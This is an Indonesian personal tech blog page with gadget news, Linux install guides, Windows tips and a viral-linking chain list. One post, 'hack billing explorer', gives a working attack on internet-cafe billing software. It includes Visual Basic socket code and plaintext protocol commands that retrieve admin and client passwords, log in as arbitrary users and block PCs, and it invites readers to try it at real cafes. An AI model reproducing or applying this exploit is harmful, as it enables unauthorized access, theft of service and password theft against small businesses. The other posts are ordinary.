Viral Linking

{Start Copy Here}

Rules :

1. Copy Paste from {Start Copy Here} to {End Copy Here}
2. Please Link Back to the person who tagged you and PASS this tag to many of your friends.
3. If you have more the one Blog, please post this to all of your Blogs, the more the merrier
4. The use of NO FOLLOW on links is not allowed, Let's all be fair!
5. Remember to come back here at JENNY TALKS (pls don't change this link) and leave the exact post url so i can add you to the master list to help increase our rankings and improve our Technorati Authority
6. Spread the Virus.. oooooops i mean the VIRAL LINKING and happy blogging

BLOGGERS :

#1. Scraps & Shots #2. Simply Jen 3. This and That 4. Fab & Chic Finds 5.A Slice of Life 6. Jenny Talks 7.Tech Stuff Plus 8. Food on the Table 9. Aussie Talks 10. When Mom Talks 11. Moments of My Life 12. My Crossroads 13. A Life in Bloom 14. Because Life is a Blessing 15. Digiscraptology 16. BLOGSILOG 14.Cherry's Comfort Zone 15. DigiScrapz: Captured Memories 16. Buzzy Me 17. Fab Finds, Etc. 18. Thinking Out Loud 19. Wishing and Hoping 20. PRC Board Exam Results 21. Jobs Abroad 22. My Blog Portfolio17.Race Corner 18. Mommy Talks. 19. Home and Health 20. All Kinds of Me Stuff 21. Ink Baby Studios 22.The Salad Caper 23. Winding Creek Circle 24. Aggie Scraps 25. Momma Stuff 26. We Are Family 27.Gandacious 28. Busynessworld 29. Folcreative 30. Swanportraits 31. Rumination Under The Clouds 32.Consciously Think 33. Sprawt 34. Healthy Skinny 35. Geekyology 36. When Mom Speaks 37. Rumination38. Amiable Amy 39. Captured on Time 40. Pit of Gadgetry 41. Me and Mine 42. Little Peanut 43. Creative in Me 44. Around the world 45. Pea in a Pod 46. For the LOVE of Food 47. Music of My Heart 48. It’s Where the Heart Is 49. Blog in to Space 50. A Mothers Horizon 51. Simply me 52. Whats Up 53. Comedy Plus 54.Lovin' Life 55.Ozzy's Mom 56. Apple and Candie 57. I was once lost in love 58. Pinay in Love 59. Pau's Big Thoughts 60. Twisted Angel 61. Hailey's Beat and Bits 62. Living A' La Mode 63. Bits and Pieces 64. Honey and Daisy 65. Pinay Ads 66. Great Kingkay 66. It's Naptime 67. Lisgold 68. Signe Says 69. Thomas Web Links 70. Thomas Travel Tales 71. Nita's Corner 72. Great Finds and Deals 73. Nita's Ramblings 74.Batuananons 75. Filipino Online Community 76. Healthy Living and Lifestyle 77. CompTechGadgets 78.Nita's Random Thoughts 79. Make Money Online 80. Erlinda's Wandering Thoughts 81. Kitty's haven 82.This and That 83. Shoppaholic girly 84. My Life in this Wonderful World 85. My Online World 86. Joys in Life 87. Journey in Life 88. Tere's World 89. Jean's Live it Up 90. Muzikistah 91. Maharot 92. SUPASTAH!93.Life is a constant journey 94.Amazingly Me 70. Treeennndddzzz 96. otwarteInfo’s 98. AdventureSage 99. in-Tech Revolution 100. LovingMore 101. From Melissa's Desk 102. denz Recreational 103. Network of Combined Ideas 104. Sheltered Not Shattered 105. Mommying on the Fly 106. Me, Myself and Darly 107. Stay at Home Mom 108. Harmony in Motion 109. My Happy Thoughts 110. Mommyhood is Thankless 111. Life is Random. SO.I.AM 112.Life's sweet and spices 113. Rainbow Colored Me 114. My Oweini Life 115. All About Mye Life 116. Is it Bedtime Yet 117. Super Coupon Girl 118. My Life.... My Journey 119. Project Wicked Blogs and Reviews 120. Life According To Me 121. WilStop 122. I Love Pixels 123. Cellulitic Bliss 124.Underneath It All 125. Momstart 126. Pinaymama's Diary 127. My Heart 4 Him 128. 1StopMom 129.Random Chronicles 130. Maeyonnaise 131.Blessings in Life 132. Survivor Mom 133. Sharing my Thoughts134. Beautiful Language 135. Medical Updates 136. Living in One Income 137. Mommy Elvz 138.elymac&frendz 139. BeinG mYselF 140. Love's Haven 141. Mi Mundo Del Amor 142. Budiawan Hutasoit. 143. Mr6ta (The MaNiaX BLoG) 144. Your Blog Here


{End Copy Here}
Posted in | 0 komentar

Kingston Luncurkan Flash Disc 64GB

berita terbaru soal flash disc ,,
Kingston mengumumkan peluncuran produk flashdisk DataTraveler dengan kapasitas sebesar 64GB menghadirkan kapasitas terbesar dari produk2 flashdisk DataTraveler USB.
Flash Disc inie membawa flashdisk selangkah lebih maju dngn kapasitas penyimpanan besar yang dikemas ke dalam ukuran yang kecil nan mungil ^_^
Peningkatan pada ukuran file untuk menyimpan musik dan foto, serta permintaan pasar akan adanya media penyimpan yang memiliki ukuran yang kecil tetapi memiliki kapasitas yang sangat besar. DT 150 merupakan jawaban atas permintaan tersebut saat ini.

Flash ini kompatibel dengan Windows Vista, XP dan Windows 2000 serta Mac OS X 10.3 (dan di atasnya) dan Linux 2.6 (dan di atasnya). Sama seperti semua produk USB drive dari Kingston, DT 150 juga memiliki garansi selama 5 tahun dan gratis dukungan teknis…
Eh fren kiro2 hargane pinten yaw??? Mungkinkah sampe 1jt ???
Qta tunggu aza datengnya nenk Indonesia.
Posted in | 0 komentar

Kirimkan Aspirasi Anda SMS Ke Walikota Solo


Agak melenceng sih ma tema di blogku tapi informasinya agak puenting jadi yow tak posting wae ^_^
Warga Kota Solo yang ingin menyalurkan aspirasinya langsung melalui sms kepada walikota dan atau wakil walikota. Anda bisa mengetik pesan atau aspirasi anda dan kirimkan ke no 0817441111 untuk ke walikota Solo. Atau jika anda ingin mengirimkan pesan kepada wakil walikota Solo ketik pesan anda dan kirimkan ke 0817442222. Mudah-mudahan aspirasi anda direspon dengan baik.
Posted in | 0 komentar

Request CD LINUX


Beberapa hari yg lalu pas barusan pulang dari skulah qu kaget dirumahqu kok ada bungkusan paketan buat qu dari Netherland?? Apaan yah……..jadi akuh penasaran langsung saja aku buka:D Ternyata isinya paket CD Ubuntu yang qu pesen:) Padahal sebelumnya pesen CD nya cuma iseng-iseng saja(^_^), tnyata nyampe jga loh ke rumah. Kalau kamu - kamu juga pengen dapet CD ubuntu original buruan daftar segera, gratisss kok!! kamu sekalian cma perlu bayar ongkos kirm lokal aza, kalau di solo atow surakarta aku cuma bayar 10000 perak bwat dapet 9 CD (3 Ubuntu, 3 Kubuntu, dan 3 Edubuntu). kamu harus sabar bwat nungguin CD nya, kalau aku kemarin kira2 1.5 bln baru nyampe rumah:D(suwi banget yow)

Yang mau daftar silahkan mapir di sini :

http://www.shipit.ubuntu.com/
http://www.shipit.kubuntu.org/
http://www.shipit.edubuntu.org/

Moga2 bermanfaat bwat semuanya..
Posted in | 0 komentar

Kamu Taw Arti Ubuntu ??




Kamu tau ga artinya Ubuntu??Bukan Usus Buntu.Beda lagi.kalau itu penyakit mas.Ukey mari kita lets jump,

"Ubuntu" itu berasal dari bahasa kuno Afrika loh.(Bayangain aja qta blum lahir ke dunia tuh^_^), yang berarti "rasa perikemanusian terhadap sesama manusia". Ubuntu juga bisa berarti "aku adalah aku karena keberadaan kita semua". Nah tujuan dari distribusi Linux Ubuntu adalah membawa semangat yang terkandung di dalam Ubuntu ke dalam dunia perangkat lunak.

Ubuntu adalah sistem operasi lengkap berbasis Linux, tersedia secara bebas loh katanya mbah dun dan mempunyai dukungan baik yang berasal dari komunitas maupun tenaga ahli profesional. And Ubuntu sendiri dikembangkan oleh komunitas sukarelawan Ubuntu.

Komunitas Ubuntu dibentuk berdasarkan gagasan yang terdapat di dalam filosofi Ubuntu: bahwa perangkat lunak harus tersedia dengan bebas biaya, bahwa aplikasi perangkat lunak tersebut harus dapat digunakan dalam bahasa lokal masing-masing dan untuk orang-orang yang mempunyai keterbatasan fisik, dan bahwa pengguna harus mempunyai kebebasan untuk mengubah perangkat lunak sesuai dengan apa yang mereka butuhkan.

Perihal kebebasan inilah yang membuat Ubuntu berbeda dari perangkat lunak berpemilik (proprietary); bukan hanya peralatan yang Anda butuhkan tersedia secara bebas biaya, tetapi Anda juga mempunyai hak untuk memodifikasi perangkat lunak Anda sampai perangkat lunak tersebut bekerja sesuai dengan yang Anda inginkan.


Berikut ini adalah komitmen tim Ubuntu dalam konferensi persnya untuk para penggunanya:


* Ubuntu akan selalu bebas dari biaya apapun, maka dari itu tidak akan ada biaya tambahan untuk "edisi enterprise", kami akan membuat semua pekerjaan terbaik Ubuntu tersedia untuk semua orang dengan istilah Bebas yang sama.(Enggak usah ngroggoh kocek sama sekali)
* Ubuntu juga menyediakan dukungan komersial dari ratusan perusahaan di seluruh dunia. Ubuntu dirilis secara tetap dan dapat Anda prediksikan; rilis Ubuntu terbaru tersedia setiap enam bulan. Setiap rilis akan didukung oleh Ubuntu dengan perbaikan pada keamanan dan perbaikan lainnya secara bebas selama sekurangnya 18 bulan.
* Ubuntu akan menyertakan terjemahan dan prasarana aksesibilitas terbaik yang dimiliki oleh komunitas Perangkat Lunak Bebas, hal ini berguna untuk membuat Ubuntu dapat dipergunakan oleh banyak orang. Kami juga bekerja sama dengan seluruh komunitas Perangkat Lunak Bebas dalam hal perbaikan bug dan saling membagi kode.
* Ubuntu berkomitmen secara penuh terhadap prinsip-prinsip dari pengembangan perangkat lunak bebas; untuk ini kami mendorong masyarakat untuk menggunakan perangkat lunak bebas dan open source, lalu memperbaikinya dan kemudian menyebarkannya kembali.

(Boleh dibajak nih ^_^)

Ubuntu cocok digunakan baik untuk komputer kamu maupun digunakan buwat server. Ubuntu saat ini mendukung berbagai arsitektur komputer seperti PC (Intel x86), PC 64-bita (AMD64), PowerPC (Apple iBook dan Powerbook, G4 dan G5), Sun UltraSPARC dan T1 (Sun Fire T1000 dan T2000).(apaan sih itu?????hahahaha)

Ubuntu menyertakan lebih dari 16.000 buah softaware atou perangkat lunak yang mendukung, dan untuk instalasi desktop dapat dilakukan dengan menggunakan satu CD saja. Ubuntu menyertakan semua aplikasi standar untuk desktop mulai dari pengolah kata, aplikasi lembar sebar (spreadsheet) hingga aplikasi untuk mengakses internet, perangkat lunak untuk server web, peralatan untuk bahasa pemrograman dan tentu saja beragam permainan.
Posted in | 0 komentar

Mengubah Taskbar Vista Menjadi Windows 7

Seperti yang terlihat pada gambar di bawah ini tampilan Taskbar sudah tidak lagi menggunakan ikon kecil dengan nama aplikasi untuk menunjukkan jendela yang sedang terbuka, tapi cuma nampilin ikon berukuran gede seperti yang dilakukan Apple pada Mac OS X. Mesti udah pada tau semua.

Kamu bisa kokmengganti taskbar Windows Vista sehingga mirip dengan yang ada di Windows 7.Mesti mau kan?? Cukup gunakan aplikasi EnhanceMyVista yang dapat kamu download versi gratisnya di sini.Dijamin gratis loh.Kalau udah selesai downloadnya ikuti ya cara-caranya sepeti di bawah ini :

Install EnhanceMyVista yang udah kamu download tadi
Jalankan aplikasi EnhanceMyVista, klik tab Customization > Taskbar dan pilih iconize your taskbar

Save, tutup aplikasi tersebut dan restart computer atow notebookmu.
Setelah restart, klik kanan pada taskbar dan pilih unlock taskbar dan sekali lagi klik kanan di quick launch dan pilih View > Large icon.


Drag tepi atas taskbar untuk diperbesar hingga berukuran sebesar di Windows 7.

Jika ukuran taskbar sudah sesuai dengan pilihanmu, kunci kembali taskbar dengan klik kanan pada taskbar dan pilih Lock the Taskbar.

Selamat windows kamu udah jadi windows terbaru. Walau Cuma taskbarnya. ^_^
Posted in | 0 komentar

Cara Install Slackware

Postingan ini cuma sekedar iseng aja kok, tapi semoga bermanfaat


Ini dia caranya install slackwarenya..tapi eang versi 11 loh

Ikuti Langkah2 e :

1. Masukkan CD-1 Slackware 11 end jangan lupa 1st bootnya harus cd-room loh

2. Pada dialog "Enter 1 to select a keyboard map", ketikkan Enter

3. Pada dialog "slackware login:" masukkan "root", kemudian Enter

4. Pada dialog "root@slakware:/#" masukkan setup, kemudian Enter.

5. Akan muncul dialog "Slackware Linux Setup (version 11.0) dengan pilihan - pilihan laennya.

6. Pilih Swap [Enter]
Pilih partisi swap yang akan dipakai, misal /dev/hda6.
7. Pada dialog "Check Swap Partitions For Bad Blocks", boleh pilih Yes atau No. Pilihlah Yes untuk memeriksa Bad Blocks. Kemudian muncul dialog "SWAP SPACE CONFIGURED" yang menyatakan partisi swap yang kita pilih sudah siap. Pilih [Enter].

8. Kemudian muncul dialog "Select Linux installation partition
Pilih /dev/hda5 misalnya yang sudah kita siapkan.abiz ntu [enter]

9. Pada Dialog "Format Partition /dev/hda5"* (*atau partisi yang tadi sudah dipilih), pilih [Format], pilih ext3 Journalising Filesystem atau yang lainnya (bebas). [Enter]

10.Pada Dialog "Select Inode", pilih yang default (=4096) saja, [Enter] dan tunggu beberapa saat

11.Kemudian dialog "Select other Linux partitions for /etc/fstab", artinya pilih partisi linux lainnya yang mau ditambahkan ke system linux kita. Misalnya pilih /dev/hda7 yang dipersiapkan untuk /home, , kemudian pilih [Format], [ext3 journalising], inode [4096] pada dialog-dialog seterusnya.

12.Pada dialog "MOUNT POINT FOR /dev/hda7"* (*atau partisi yang kita pilih), masukkan /home dan pilih

13.Muncul berita "DONE ADDING LINUX PARTITIONS TO /etc/fstab", artinya partisi-partisi linux sudah dimasukkan ke system yang akan kita install.

14.Pada dialog "FAT or NTFS PARTITIONS DETECTED", jawab

15.Pilih partisi FAT atau NTFS dari MsWin yang mau dibuat bisa-dibaca oleh system linux, misal /dev/hda1, [Enter]

16.Pada dialog "Pick Mount Point ...", ketikkan misalnya /winxp [OK], juga [OK] pada dialog informatif berikutnya.

17.Muncul dialog "SOURCE MEDIA SELECTION", pilih [1] Install from a Slackware CD or DVD [Enter]

18.Pada "SCANNING FOR CD or DVD DRIVE", pilih [auto],
Tunggu bentar aza cz ga lama kok nunggunya.

19.Muncul "PACKAGE SERIES SELECTION", pakai pilihan paket-paket yang default saja, jadi langsung saja dengan mengetikkan [ENTER], pada dialog berikutnya pilih [full], maka Slackware akan memulai instalasi.

20.Slackware mulai menginstall paket-paket menurut seri-serinya. Tunggu beberapa saat tapi agak lama loh,,agak boring sie nunggu

21.muncul "INSERT NEXT DISC" truz keluarkan disc1 lalu masukin cd eang ke 2

22.muncul dialog "WARNING: NO ROOT PASSWORD DETECTED", pilih untuk memasang password root (=Administrator). [Enter]

23.Masukkan password root dan konfirmasi password root.
(kalo ga ada dilewati ajah)
24. Muncul "CONFIGURE THE SYSTEM" [Yes, Enter]

25. Muncul "INSTALL LINUX KERNEL", jawab [cdrom, OK, Enter]

26. Pilih default saja yaitu /cdrom/kernels/sata.i/bzImage [Enter]

27. "MAKE BOOTDISK", pilih Create, masukkan sebuah floppy kosong SANGAT DIANJURKAN MEMBUAT FLOPPY BOOT!!( kalo ga ada floppy ga usah )
atau boleh pilih [Skip] di sini. TIDAK DIANJURKAN.

28. "MODEM CONFIGURATION", [no modem, Enter]

29. "Enable Hotplug ", [Yes, Enter]

30. "INSTALL LILO", [simple, OK]

31. "CONFIGURE LILO TO USE FRAMEBUFFER CONSOLE?", [1024x768x256, Enter]

32. "OPTIONAL LILO ...", kosongkan saja [OK, Enter]

33. "SELECT LILO DESTINATION", jawab [root, OK]

34. "MOUSE CONFIGURATION" pilih ps/2 atau usb tergantung pada jenis mouse punya kamu. [OK]

35. "GPM CONFIGURATION", [Yes,Enter]

36. "CONFIRM STARTUP SERVICE TO RUN], ikuti default, langsung [ENTER] saja.

37. "CONSOLE FONT CONFIGURATION", [No, Enter]

38. "HARDWARE CLOCK SET TO UTC?", [No, Enter]

39. "TIMEZONE Configuration", pilih waktunya.kalo di jakarta ya di jakarta ga usah sing2.^_^ [OK]

40. "SELECT DEFAULT WINDOW MANAGER FOR X", pilih xinitrc.kde [OK]

41. "WARNING: no root password", jawab , untuk memasukkan password root. Masukkan password root dua kali. Bila ini system percobaan baiknya Anda mencatat root password kamu pada kertas aza cz takut kalo kamu lupa.

42. "REPLACE /etc/fstab",

43. "SETUP COMPLETE". Restart komputermu..

Selesai juga intall slackwarenya..lama banget ea??hehehehehehehehe
SYSTEM SLACKWARE 11 kamu SUDAH TERINSTALL. Kalo udah di restart n jangan lupa keluarin ntu cd slackwarenya..
Semoga yang sedikit tadi bisa bermanfaat bagi xan semuanya. ^_^
Posted in | 0 komentar

Nokia 5800 XpressMusic Siap Guncang Pasar

Nokia akhirnya secara resmi bergabung dengan produsen ponsel layar sentuh lain seperti Apple, HTC, Samsung dan LG dengan merilis Nokia 5800 XpressMusic. Model baru S60 layar sentuh ini telah dipamerkan di London dan Singapura dengan layar sentuh berukuran 3,2 inci (360 x 640), konektivitas WLAN dan 3G, kamera otofokus 3.2MP yang bisa merekam video VGA pada 30 fps dan juga dilengkapi dengan lensa Carl-Seizz. Selain itu, masih ada dukungan GSM quad-band dan 3G dengan HSDPA. Ekstra lainnya meliputi: GPS, audio jack standar 3,5mm, TV-out, dan slot kartu microSD, cukup lengkap untuk sebuah ponsel di segmen menengah.

Nokia juga melengkapi dengan aksesoris speaker stereo surround dan microSD nya berukuran 8GB untuk memaksimumkan kenikmatan mendengar musik. Xpress Music 5800 datang dengan dua tambahan tombol sentuh, tombol di bagian kanan atas ponsel akan memunculkan "Media Bar" yang memberikan kemudahan akses musik, media dan konten online sedangkan "Contacts Bar" menyediakan tombol sentuh untuk mengakses kontak, favorit, menyimpan panggilan, pesan teks dan panggilan terakhir.

Fitur sentuh ponsel ini tidak sebaik/se-sensitif iPhone yang dapat sepenuhnya dipakai hanya dengan jari, tetapi Nokia juga menyediakan stylus bagi pengguna yang merasa kesulitan. via (GSMArena)

Comes With Music
Nokia juga mengumumkan bahwa Xpress 5800 akan "Comes With Music," sebuah layanan subskripsi yang menawarkan unduhan lagu tidak terbatas selama 12 bulan. Pengguna tidak perlu membayar sepeser pun karena biaya unduhan sudah termasuk dalam biaya penjualan ponsel. Nokia bukanlah satu-satunya perusahaan yang menawarkan layanan berlangganan musik, tetapi tidak seperti Napster di mana pengguna tidak lagi boleh mendengarkan musiknya setelah berhenti berlangganan, Nokia memperbolehkan pengguna untuk terus memiliki semua musik yang diunduh setelah masa berlangganan berakhir.
Posted in | 0 komentar

Ponsel SE dengan Kamera 8.1 MP

Kalau Anda berpikir 5 megapixel (MP) adalah resolusi terbesar untuk kamera ponsel yang ada saat ini, berarti Anda belum melihat produk keluaran terbaru Sony Ericsson dari keluarga Cyber-shot (tidak salah — Cyber-shot lini produk kamera digital dari Sony).

Sony Ericsson C905 Cyber-shot dengan kode Shiho adalah ponsel yang mengemas kamera beresolusi 8 MP yang sanggup menghasilkan foto berresolusi 3264 x 2448 pixel. Ponsel dengan bentuk slider ini berdimensi 104 x 49 x 19.5mm dengan berat 136 gram dan tersedia dalam tiga warna Copper Gold, Ice Silver dan Night Black. Shiho sudah mengemas memori internal sebesar 160 MB dan sudah datang dengan Memory Stick Micro™ (M2™) berkapasitas 2 GB, dapat di-upgradehingga 8 GB.

Shiho datang dengan layar QVGA TFT 2,4 inci dengan lapisan anti gores, accelerometer yang dapat secara otomatis mendeteksi orientasi dan mengubah tampilan layar (portrait/landscape) sesuai keadaan ponsel dan GPS sehingga Anda dapat dengan mudah menambahkan geotagging pada foto. Fasilitas GPS juga dapat dimanfaatkan untuk aplikasi Google Maps for Mobile dan penentu lokasi dari Wayfinder Navigator 7.

Kamera
Untuk mendukung kamera 8 MP ini Sony juga menambahkan fitur auto-focus, image stabilization, Smart contrast dan face detection sehingga gambar yang dihasilkan jauh lebih jelas dan tajam. Untuk mengatasi kesulitan yang sering dihadapi saat memotret dalam lingkungan minim cahaya Shiho juga memiliki Xenon flash.

Fitur lainnya adalah BestPic yang memotret hingga sembilan sembilan buah foto dalam satu detik sehingga Anda dapat kemudian memilih satu gambar terbaik. Shiho juga memberikan opsi untuk mengirim foto ke Facebook dan Picasa Web Album. Jika Anda memiliki akun Blogger foto tersebut juga bisa dikirimkan ke blog Anda dengan lebih mudah.





Untuk Anda yang sangat menggemari fotografi, SE C905 bisa menjadi senjata andalan untuk menangkap setiap fenomena di lingkungan sekitar. Ponsel ini dapat menghasilkan foto bekualitas tinggi yang hampir menyamai kemampuan kamera digital yang Anda miliki (misal: 8 megapixel Canon EOS-1D Mark II N).

Ponsel ini tidak hanya unggul di sisi kamera yang tertanam di dalamnya, tapi juga konektivitas dan fasilitas hiburan terkini yang sangat digemari banyak kalangan.
Konektivitas
Dari segi konektivitas Shiho sudah mendukung quad-band GSM/EDGE, UMTS dan HSDPA, tetapi yang istimewa adalah kemampuan Wi-Fi untuk mengakses internet. Jarang sekali SE mengeluarkan produk dengan Wi-Fi, padahal manfaatnya sangat besar untuk para pengguna yang haus akan koneksi internet murah. Dengan Wi-Fi kita dapat memanfaatkan berbagai hotspot yang tersedia di berbagai tempat, memudahkan kita untuk mengakses konten di internet dalam kecepatan tinggi.

Fitur Wi-Fi Shiho sudah mendukung DLNA (Digital Living Network Alliance) yang juga dimiliki Nokia N96. Fitur ini memungkinkan Anda untuk mengirim dan berbagi foto secara nirkabel dan menampilkan slideshow di TV, laptop atau Playstation 3. Selain itu tersedia juga Bluetooth stereo yang mendukung fitur A2DP, USB dan FM radio dengan RDS (Radio Data System).
Posted in | 0 komentar

Kemenangan Obama Ciptakan Rekor Baru di Seluruh Penjuru Web

Obama


Saat dunia menyaksikan peliputan kampanye pemilihan presiden Amerika Serikat dan pidato kemenangan Obama kemarin, banyaknya pengunjung yang mencari informasi di web menembus rekor historis, menurut data dari Akamai penyedia layanan distribusi konten web global untuk CNN, NBC, BBC, Reuters dan masih banyak lagi. Akamai mencatat 8,5 juta "pengunjung global per menit" pada jam 23:00 EST kemarin. Rekor sebelumnya adalah 7.2 juta kunjungan pada Juni 2006 kemarin saat piala dunia digelar.

akamai"Kami percaya bahwa informasi yang dikomunikasikan 'Net Usage Index for News' merupakan alat pengukur yang penting untuk menunjukkan peran internet pada kehidupan kita sehari-hari. Hari pemilihan presiden kemarin menunjukan penetrasi global trafik web terbesar sepanjang sejarah yang pernah kami lihat sejak meluncurkan indeks pada Agustus 2005. Kami berharap tingkat trafik internet akan terus meningkat mengikuti peristiwa bersejarah kemarin," menurut juru bicara Akamai.

Sementara itu, CNN.com juga memecahkan rekor trafik baru. "Pada hari pemilihan presiden, CNN.com menarik lebih dari 27 juta pengunjung unik — tertinggi sepanjang sejarah situs tersebut. Terlebih lagi, siaran langsung CNN.com memecahkan rekor sebelumnya dengan menyediakan 4,9 juta video stream, hampir tiga kali lipat dari rekor trafik sebvelumnya. CNN juga mendapatkan 276 juta page view dan menayangkan 6,7 juta video stream on demand pada tanggal 4 November kemarin", menurut juru bicara CNN.

Rekor trafik internet baru ini juga didukung data Hitwise yang memperlihatkan peningkatan trafik data di berbagai situs berita dunia. Menurut data yang dirilis Hitwise, trafik CNN pada hari pemilihan presiden Amerika meningkat sebesar 146%, MSNBC, Fox News dan the Drudge Rrport juga mendapat kunjungan yang lebih besar dari biasanya. Trafik Twitter sendiri meningkat 43% sedangkan trafik ke election.twitter.com meningkat 1100%.

Statistik hitwise untuk hari pemilihan presiden Amerika Serikat
Posted in | 0 komentar

Windows 7 Dirilis Tahun Depan

Windows 7 Walaupun sebelumnya Microsoft pernah mengatakan bahwa Windows 7 akan tersedia tiga tahun setelah keluarnya (2010), di WinHEC Microsoft memberikan sinyal kuat mereka berencana merilis Windows 7 untuk dikemas dalam berbagai PC yang dijual dalam musim natal tahun 2009.

Dalam sebuah presentasi yang mendiskusikan program Velocity untuk meningkatkan kualitas PC, direktur Doug Howe mengatakan bahwa program Vista Velocity akan diteruskan hingga musim semi tahun depan (kuartal kedua) untuk meningkatkan PC berbasis Vista hingga periode back to school, setelah itu mereka akan melanjutkan program Velocity menitik beratkan pada Windows 7. Howe juga sudah mengkonfirmasikan pada CNet, mengatakan bahwa "fokus musim liburan dipastikan berada pada 7."

Walaupun belum mengkonfirmasikan jadwal rilis resmi Windows 7, beberapa mitra sudah diberi tahu untuk mengantisipasi Windows 7 tahun depan. Microsoft hanya mengatakan bahwa mereka akan merilis versi beta di awal tahun depan dan mengatakan hanya akan merilis satu versi RC sebelum versi final.

Windows Explorer di Windows 7


Velocity adalah program yang dimulai Microsoft di bulan Juli 2007 untuk mengidentifikasi penyebab utama lambatnya kinerja sistem. Setelah menyadari bahwa usaha mempercepat kinerja sistem jauh lebih besar dari yang diprediksi sejak awal, mereka kemudian memutuskan untuk melanjutkan program tersebut untuk membantu para produsen menciptakan PC terbaik. Velocity menitik beratkan pada mempercepat waktu boot dan shut down maupun memastikan semua PC yang dijual mengemas driver dan aplikasi stabil yang sudah disertifikasi untuk Vista.
Posted in | 0 komentar

hack billing explorer

Kalo kalian pake program packet snipper mungkin akan kelihatan, data apa saja yang dikirim ke client.......Setelah diamati beberapa menit dengan program packetsnipper ternyata setiap data yang dikirim ke client melalui winsock tidak terproteksi atau dalam kata lain hanya berupa plaintext saja...ops....ternyata....he...he....

Okeh kita lanjut lagi, jika dilihat pada data yang dikirim oleh program server selalu diawali dengan 'YYY' dan sebaliknya apabila dikirim dari client ke server akan diawali dengan 'XXX' (tanpa curek).

("Mungkin hal seperti ini akan berakibat fatal, ini bisa kita jadikan contoh bahwa data yang dikirim diusahakan harus terenkripsi untuk menghindari dan meminimalisasi pencurian data2 yang berbentuk plain text.")

Ada beberapa perintah yang dikirim dari client ke server seperti:

XXX$personal$2$HACKER$

kalo saya gak salah artikan perintah diatas, menjadi spt ini:
XXX -> Perintah dari client
$ -> sebagai seperator atau pemisah parameter
personal -> type login yang digunakan user
$ -> sebagai seperator atau pemisah parameter
2 -> No PC Client yang telah di setting
$ -> sebagai seperator atau pemisah parameter
HACKER -> Nama yang digunakan oleh user

Maka kesimpulannya kita bisa login ke program server tanpa program client bawaanya dan kita bisa ganti dengan program kecil buatan sendiri.

Coba anda buat satu project dengan:
1 form, 1 winsock control, 2 commandbutton dan 2 textbox
untuk text1 rubah properti Multiline=True dengan Scrollbars=Both

Private Sub Command1_Click()
SOCK.Close
'// Masukan IPAddress Servernya dengan Port 1500 (default port)
SOCK.Connect "192.168.0.1", "1500"
End Sub

Private Sub Command2_Click()
If SOCK.State = sckConnected Then SOCK.SendData Text2.Text
End Sub

Private Sub SOCK_DataArrival(ByVal bytesTotal As Long)
Dim Data As String
SOCK.GetData Data
Text1.SelText = Data & vbCrLf & String(50, "-") & vbCrLf

End Sub

setelah selesai koding diatas coba anda jalankan, lakukan koneksi keserver dengan menekan tombol command1. Apabila berhasil koneksi ke server coba anda tuliskan beberapa perintah dibawah ini pada textbox2 dan diakhiri dengan menekan tombol Command2.

Perintah:
XXX$passY$2$

perintah diatas digunakan untuk melihat password client dan password server pada PC Client No 2 (dua). hasil data yang dikirim dari server ke client dengan menyertakan perintah diatas akan terlihat seperti ini:

YYY$passY$008$Internet Cafe$JL. Urip Sumoharjo Makassar$Email info_008@yahoo.com - http://www.billingexplorer.com$111

kalo dilihat pada kata '008' dan '111', ini dapat diartikan sebagai password Administrator dan Password PC Client.

kita bisa klik tombol admin pada program clientnya, dan masukan passwordnya. seperti yang terlihat pada gambar dibawah ini :

anda bisa mencoba beberapa perintah dibawah ini:
1. XXX$personal$2$HACKER$
(Login pada PC no 2 dengan nama user HACKER)
2. XXX$stop$2$HACKER
(untuk logout dari billing)
3. XXX$con$2$HACKER
4. XXX$infod2$2$
5. XXX$ablock$2$
6. XXX$admin$2$Admin
7. XXX$tutup$2$$

Anda bisa cari lagi perintah2 yg lain dengan menggunakan packet snipper seperti 'EtherDetect Packet Sniffer'.

Selain itu ada beberapa kelemahan lain yang terdapat pada program ini, seperti tidak diproteksinya file executable dengan program-program compress exe, spt UPX,PE-COMPAT ataupun yg lain. ini sangat memudahkan untuk di CRack.

Sekedar info, program yang saya coba adalah Billing-Explorer Ver 4.40 Grand R-14a. yang di compile dengan visual basic v 5.0

Jadi kalo jalan-jalan ke warnet dan kebetulan billing nya menggunakan program ini, hmmm.m.m..mmmm...sekalian bisa dicoba...nih...
Posted in | 0 komentar

Aktifkan Admin di Windows Vista

Bagaimana mengatifkan administrator di Vista :
emang sie buka admin di vista ga segampang di xp.kalo di xp kan tinggal utek2 regestri,jadi deh tuh si admin.
tapi laen halnya sma vista.
Nie gue punya dkit2 tutorial bwat anda2 yank pengen taw buka admin di vista.
1. Log on vista dengan user punya kalian
2. tekan tuw tombol start
3. tekan start search
4. Type, cmd
5. klik kanan tuw cmd, trus pilih 'Run As Administrator' darie menu sortcut
6. in the black'DOS box' kasi perintah koyo gini "Net Help User"
7. The idea of the last command is just to observe the options for Net User. In particular, examine the syntax to set the password.
8. The next instruction is the crucial command. I have chosen password = triawan, you may want to choose different characters.
9. Net user administrator triawan
10. Net user administrator /active:yes
11. trus cek pesan : The Command Completed Successlly
12. abiez ntu switch user atow logoff
13. Logon as Administrator Password triawan

semoga iang dkit tadi bisa bermanfaat yow kang...
Posted in | 0 komentar

November Kelam

taw ga sie loee,,(palink2 yow ga ngerti,hahahahahaha)
dari tgl 31 oktober ntu blog gue berantakan,,cz gara2 maw gnti template...
suebel tenan...abiznya gue lum sempet back up script gue..ya jadi semuannya ilang dwehh
nah nie hari qu udah benerin lagi..syukur Alhamdulillah padaMu ya ALLAH.
thx god..i lup u ALLAH..


tapi ituw cuma dikit dari november kelam,,
klub favorit gue..VALENCIA tuw kalah dari racing santander,
en posisi puncaknya lengser deh n barca lade eang nomer atu.suebel tenan,,!!!!!!!!!
tapi ad rasa seneng juga..TOTENNHAM HOTSPURS akhirnya biza ngrasake kmenangan lagi cz
slama dilatih juande ramos..spurs ga pnah se x1 pun kemenangan..
n minngu kemarin biza ngalahken liverpool..duh seneng e..



dah wez,,gtu six ae november paling kelamm.....................
Posted in | 0 komentar